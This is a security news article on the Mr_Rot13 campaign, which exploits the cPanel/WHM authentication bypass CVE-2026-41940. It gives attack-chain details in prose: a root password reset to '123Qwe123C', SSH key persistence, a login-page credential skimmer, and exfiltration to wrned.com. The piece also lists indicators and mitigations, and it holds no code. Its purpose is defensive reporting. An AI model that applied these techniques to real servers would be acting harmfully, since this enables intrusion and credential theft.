CVE-2026-41940: Global Campaign Targets cPanel Authentication Bypass to Deploy Cross-Platform Backdoors

Threat actor Mr_Rot13 is actively exploiting CVE-2026-41940 in cPanel/WHM to deploy the 'Filemanager' backdoor. With over 2,000 IPs involved and infrastructure…

The threat actor known as Mr_Rot13 is actively weaponizing CVE-2026-41940—an authentication bypass vulnerability in cPanel and WHM—to distribute the "Filemanager" cross-platform backdoor. Research published by QiAnXin XLab on May 11, 2026, documents a global campaign targeting hosting servers at scale, with over 2,000 unique IP addresses participating in automated attacks against the flaw. For hosting providers and system administrators, the situation demands immediate action: vulnerable platforms must be patched and audited for compromised credentials and rogue SSH keys within hours, not days.

Key Takeaways

CVE-2026-41940 is an authentication bypass classified as CWE-306 within the cPanel and WHM login flow. The NVD confirms affected versions range from 11.40 to 136.0.5, and the flaw was added to the CISA KEV catalog on April 30, 2026.
The threat actor Mr_Rot13 automates post-exploitation using a Go-based payload that resets the root password, implants a public SSH key for persistence, and drops a PHP web shell to facilitate further infection.
Monitoring data reveals over 2,000 source IPs worldwide, primarily concentrated in Germany, the United States, Brazil, and the Netherlands, engaged in automated exploitation attempts.
The group’s command-and-control (C2) infrastructure, including the domain wrned.com registered in October 2020, has maintained a near-zero detection rate across security products for nearly six years.

Login Flow Bypass and Server Compromise

CVE-2026-41940 is a critical authentication flaw in the cPanel and WebHost Manager (WHM) login sequence. Classified by the National Vulnerability Database as CWE-306 (Missing Authentication for Critical Function), the vulnerability impacts versions 11.40 through 136.0.5. While not a direct Remote Code Execution (RCE) vulnerability, the bypass allows attackers to gain unauthorized administrative access to the management panel.

Once access is achieved, post-exploitation is rapid and standardized. A shell script retrieves a Go payload from the domain cp.dene.[de.]com; this executable, titled "Payload," resets the compromised system's root password to '123Qwe123C'—a specific indicator of compromise (IoC) for this campaign. Simultaneously, the payload installs a public SSH key to ensure persistent access even if credentials are later changed and plants a PHP web shell within the cPanel directory.

Go Payload Analysis: SSH Persistence and AI-Generated Logs

The executable identified by QiAnXin XLab and cited by SecurityAffairs contains an unusual characteristic: internal log messages are written in Turkish and appear to be generated via artificial intelligence. While this detail does not impact the code's lethality, it provides a potential clue regarding the development environment or the operators' origins. Upon execution, the payload immediately secures persistence by installing an SSH key and deploying a PHP web shell for data harvesting. The modular nature of this infection chain allows Mr_Rot13 to pivot quickly without rewriting their entire toolset.

Mr_Rot13: A Long-Standing Actor with C2 Active Since 2020

Mr_Rot13 operates via infrastructure dating back to October 2020. The domain wrned.com, used to receive exfiltrated credentials encrypted with ROT13, appeared in a PHP backdoor sample uploaded to VirusTotal as early as April 2022. This longevity is remarkable: for nearly six years, the actor's samples and domains have largely evaded detection by security engines.

"Over the six years from 2020 to the present, the detection rate of Mr_Rot13's related samples and infrastructure across security products has remained extremely low" — QiAnXin XLab researchers via The Hacker News

Researchers describe the actor as a cybercriminal operator rather than a nation-state threat. Their ability to maintain a low profile, combined with automated payload delivery, explains how a single campaign can compromise thousands of servers without triggering endpoint defense systems.

The choice of ROT13 for obfuscating exfiltrated data aligns with the actor's moniker but should not be mistaken for lack of sophistication. Behind the simple cipher lies a well-oiled infrastructure, including private Telegram channels and long-standing domains, which reduces reliance on compromised third-party hosting for C2 operations and bolsters botnet resilience.

Credential Harvesting and the 'Filemanager' Backdoor

The PHP web shell is designed to inject JavaScript into the cPanel login page to harvest credentials in real-time. This data is transmitted to wrned.com using ROT13 encryption—a simple yet effective method for bypassing basic traffic filters. Sensitive information targeted includes bash history, SSH data, device specifications, database passwords, and cPanel virtual aliases.

Exfiltrated data is routed to a Telegram group controlled by the user '0xWR'. From the same infrastructure, the domain wpsock[.]com hosts the "Filemanager" backdoor. This tool is cross-platform, compatible with Windows, macOS, and Linux, providing the operator with file management capabilities, remote command execution, and an interactive shell, effectively turning the compromised server into a permanent access node.

In-the-Wild Exploitation and Global Attack Surface

Active exploitation has been independently verified by watchTowr, which released a tool to identify vulnerable instances. The Shadowserver Foundation has flagged thousands of cPanel installations potentially exposed to the internet. According to QiAnXin XLab data, more than 2,000 source IPs are involved in automated attacks, though it remains unconfirmed if Mr_Rot13 controls the entire volume. The same CVE is likely attracting various operators interested in cryptomining, ransomware, or botnet expansion.

The vast attack surface is a result of cPanel’s ubiquity in the global shared and dedicated hosting market. The thousands of exposed instances reported by Shadowserver amplify the risk of cascading compromises: a single breached server can host hundreds of websites and corporate databases, turning a local authentication bypass into a multi-tenant disaster.

SecurityAffairs has also reported attacks against government and military institutions in Southeast Asia, with an estimated 4.37 GB of sensitive data stolen. However, it is not yet clear if these specific incidents are directly linked to Mr_Rot13 or other threat actors exploiting the same vulnerability.

Response and Mitigation Strategies

Immediately verify if cPanel/WHM instances fall within the vulnerable version range (11.40 to 136.0.5) and apply vendor-provided security updates immediately, bypassing standard maintenance windows.
Rotate all root and administrative credentials, remove unauthorized SSH keys, and audit local passwords for the '123Qwe123C' indicator associated with the Mr_Rot13 campaign.
Inspect cPanel directories for unauthorized PHP web shells and analyze login page JavaScript for suspicious injections. Monitor network traffic for connections to wrned.com or wpsock[.]com.
Utilize the watchTowr identification tool to scan for vulnerable hosts and review WHM access logs for unauthenticated or anomalous sessions dating back several weeks.

The CVE-2026-41940 campaign demonstrates that even mature platforms like cPanel can become focal points for long-term persistence when a single bypass meets an actor capable of remaining invisible for years. The most concerning factor is not the attack volume, but the latency: an infrastructure active since 2020 with minimal detection suggests many past compromises may have gone completely unnoticed. For hosting providers, the priority is no longer just patching, but conducting a thorough historical audit of their systems.

Frequently Asked Questions

Is the Filemanager backdoor limited to Linux servers?

No. Analysis by QiAnXin XLab indicates that the Filemanager backdoor distributed via wpsock[.]com is cross-platform, supporting Windows, macOS, and Linux with features for file management and remote command execution.

Are the 2,000+ attacking IPs all controlled by Mr_Rot13?

This is unconfirmed. While over 2,000 IPs are actively exploiting the CVE, this figure likely includes multiple threat actors using the flaw for diverse purposes, including botnet recruitment and cryptomining.

Can standard security tools detect the PHP web shell?

Only partially. Targeted inspection of cPanel directories and JavaScript analysis of the login page are required, as the payload is modular and indicators may vary between different phases of the campaign.

Information has been verified against cited sources and is current as of the time of publication.